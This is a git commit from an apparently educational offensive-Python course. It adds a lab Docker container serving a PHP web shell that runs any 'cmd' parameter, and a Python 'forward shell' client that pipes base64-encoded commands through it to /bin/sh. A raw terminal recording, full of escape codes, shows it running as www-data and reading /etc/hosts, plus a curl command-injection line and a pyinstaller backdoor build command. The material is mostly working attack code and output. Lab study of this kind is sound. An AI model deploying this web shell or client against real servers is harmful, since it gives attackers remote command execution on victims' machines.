manuelver/Curso-lenguaje-python
1
0
Fork 0
Code Issues Pull Requests Releases Activity

wip

Browse Source
This commit is contained in:
Manuel Vergara
2024-02-02 23:02:37 +01:00
parent 0d95645a93
commit 5d7e3302c5
4 changed files with 230 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

5
python-ofensivo/15_hacking/12_fs/Dockerfile Normal file
View File

@@ -0,0 +1,5 @@
FROM php:7.0-apache
COPY index.php /var/www/html/
EXPOSE 80

5
python-ofensivo/15_hacking/12_fs/index.php Normal file
View File

@@ -0,0 +1,5 @@
<?php
system($_GET['cmd']);
?>

51
python-ofensivo/15_hacking/12_fs/script/forwardshell.py Normal file
View File

@@ -0,0 +1,51 @@
#!/usr/bin/env python3
"""
Forward Shell
Comandos para reverse shell:
https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
mkfifo input; tail -f input | /bin/sh 2>&1 > output
"""
import requests
import signal
import sys
from termcolor import colored
from base64 import b64encode
def def_handler(sig, frame):
print(colored("\n[!] Exiting...", "blue"))
sys.exit(1)
signal.signal(signal.SIGINT, def_handler)
main_url = "http://localhost/index.php"
def run_command(command):
command = b64encode(command.encode()).decode()
data = {
'cmd': 'echo "%s" | base64 -d | /bin/sh' % command
}
r = requests.get(main_url, params=data)
return r.text
if __name__ == '__main__':
while True:
command = input(colored("> ", "yellow"))
output_command = run_command(command)
print(output_command)

169
python-ofensivo/15_hacking/12_fs/typescript Normal file
View File

@@ -0,0 +1,169 @@
Script started on 2024-02-02 18:20:04+01:00 [TERM="xterm-256color" TTY="/dev/pts/1" COLUMNS="106" LINES="53"]


7🐧 ~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs at ⚡ 18:20:04
 [?2004h[?25l8]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs]1;..hacking/12_fs]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs\%


🐧 ~/Doc/p/gi/p/curso-python/python-ofensivo/15_hacking/12_fs on ☕ main ?1  🔒 ES at ⚡ 18:20:04
 [?1h=[?25h[?2004h[?25l

🐧 ~/Doc/p/gi/p/curso-python/python-ofensivo/15_hacking/12_fs on ☕ main ?1  🔒 ES vpn at ⚡ 18:20:04
 🏠 192.168.1.115[?25h[?25l

🐧 ~/Doc/p/gi/p/curso-python/python-ofensivo/15_hacking/12_fs on ☕ main ?1  🔒 ES vpn at ⚡ 18:20:04
 🏠 192.168.1.115 📡 192.145.39.55[?25hscriptscript/[?1l>[?25l[?2004l
 script/[?25h
]2;script/]1;script/%
]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\

🐧 ~/Doc/p/gi/p/curso-python/python-o/15_hacking/12_fs/script on ☕ main ?1  🔒 ES vpn at ⚡ 18:20:09
 🏠 192.168.1.115 📡 192.145.39.55[?1h=[?2004h##!#!//uussrr//bbiinn//eennvv  ppyytthhoonn3[?1l>[?25l[?2004l
 #!/usr/bin/env python3[?25h
%
]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\

🐧 ~/Doc/p/gi/p/curso-python/python-o/15_hacking/12_fs/script on ☕ main ?1  🔒 ES vpn at ⚡ 18:20:30
 🏠 192.168.1.115 📡 192.145.39.55[?1h=[?2004hccurl -s -X GET 'http://localhost/' -G --data-urlencode 'cmd=cat /etc/resolv.conf 2>&1'co🏠 192.168.1.115 📡 192.145.39.55de index.htmlcoddd           d e index.htmlcode f         irmaMail-Prefapp.htmlo                    rwat rdshell.py[?1l>[?25l[?2004l
 code forwardshell.py[?25h
]2;code forwardshell.py]1;code%
]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\

🐧 ~/Doc/p/gi/p/curso-python/python-o/15_hacking/12_fs/script on ☕ main ?1  🔒 ES vpn at ⚡ 18:20:44
 🏠 192.168.1.115 📡 192.145.39.55[?1h=[?2004hppyinstaller --noconsole --onefile backdoor.pypy                                           listener.pyf          irefox_decrypt.pyfo                orrwardshell.py  [?1l>[?25l[?2004l
 py forwardshell.py[?25h
]2;python3 forwardshell.py]1;pywww-data
%
]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\

🐧 ~/Doc/p/gi/p/curso-python/python-o/15_hacking/12_fs/script on ☕ main ?1  🔒 ES vpn at ⚡ 18:23:42
 🏠 192.168.1.115 📡 192.145.39.55[?1h=[?2004hpy forwardshell.py[?1l>[?25l[?2004l
 py forwardshell.py[?25h
]2;python3 forwardshell.py]1;py> cat
/
^CTraceback (most recent call last):
File "/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/forwardshell.py", line 23, in <module>
output_command = run_command(command)
File "/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/forwardshell.py", line 14, in run_command
r = requests.get(main_url, params=data)
File "/home/v/.local/lib/python3.10/site-packages/requests/api.py", line 73, in get
return request("get", url, params=params, **kwargs)
File "/home/v/.local/lib/python3.10/site-packages/requests/api.py", line 59, in request
return session.request(method=method, url=url, **kwargs)
File "/home/v/.local/lib/python3.10/site-packages/requests/sessions.py", line 587, in request
resp = self.send(prep, **send_kwargs)
File "/home/v/.local/lib/python3.10/site-packages/requests/sessions.py", line 701, in send
r = adapter.send(request, **kwargs)
File "/home/v/.local/lib/python3.10/site-packages/requests/adapters.py", line 489, in send
resp = conn.urlopen(
File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 700, in urlopen
httplib_response = self._make_request(
File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 446, in _make_request
six.raise_from(e, None)
File "<string>", line 3, in raise_from
File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 441, in _make_request
httplib_response = conn.getresponse()
File "/usr/lib/python3.10/http/client.py", line 1375, in getresponse
response.begin()
File "/usr/lib/python3.10/http/client.py", line 318, in begin
version, status, reason = self._read_status()
File "/usr/lib/python3.10/http/client.py", line 279, in _read_status
line = str(self.fp.readline(_MAXLINE + 1), "iso-8859-1")
File "/usr/lib/python3.10/socket.py", line 705, in readinto
return self._sock.recv_into(b)
KeyboardInterrupt
%
]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\

🐧 ~/Doc/p/gi/p/curso-python/python-o/15/12/script on ☕ main ?1
 🏠 192.168.1.115 📡 192.145.39.55[?1h=[?2004hpy forwardshell.py[?1l>[?25l[?2004l
 py forwardshell.py[?25h
]2;python3 forwardshell.py]1;py> whoami
www-data
> cat /etc/hosts
127.0.0.1 localhost
::1 localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
172.17.0.2 2f2f81768a05
> pwd
/var/www/html
> ^C
[!] Exiting...
%
]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\

🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕ main ?1 took 7m 18s 🔒 ES vpn at ⚡ 18:34:09
 🏠 192.168.1.112 📡 192.145.39.55[?1h=[?2004h[?25l

🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕ main ?1 took 7m 18s 🔒 ES vpn at ⚡ 18:34:09
 🏠 192.168.1.112 📡 192.145.39.54[?25hpy forwardshell.py[?1l>[?25l[?2004l
 py forwardshell.py[?25h
]2;python3 forwardshell.py]1;py> exit
> exit
> ^C
[!] Exiting...
%
]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\

🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕ main ?1 took 6s 🔒 ES vpn at ⚡ 18:35:25
 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hpy forwardshell.py[?1l>[?25l[?2004l
 py forwardshell.py[?25h
]2;python3 forwardshell.py]1;py> exit
> exit
> ^C
[!] Exiting...
%
]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\

🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕ main ?1 took 10s 🔒 ES vpn at ⚡ 18:36:02
 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hpy forwardshell.py[?1l>[?25l[?2004l
 py forwardshell.py[?25h
]2;python3 forwardshell.py]1;py> exit
> ls
index.php
> e ^C